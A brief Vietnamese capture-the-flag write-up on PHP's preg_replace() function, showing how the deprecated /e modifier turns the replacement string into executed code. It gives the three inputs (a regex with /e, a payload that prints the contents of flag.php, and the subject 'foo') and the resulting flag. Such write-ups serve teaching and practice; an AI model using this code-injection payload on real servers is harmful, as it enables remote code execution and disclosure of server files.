# PHP preg_replace()

Tìm hiểu về hàm preg_replace() trong PHP, bài này sẽ thay thế các kí tự trong hộp 1 mà xuất hiện trong hộp 3 thành chuỗi trong hộp 2, ta sẽ điền thứ tự các hộp như sau:

`/[A-Za-z]oo\b/e`

`print(file_get_contents('flag.php'))`

`foo`

Enter -> Ctrl + U, ta có:

---

### Flag:

`pr3g_r3pl4c3_3_m0d1f13r_styl3`

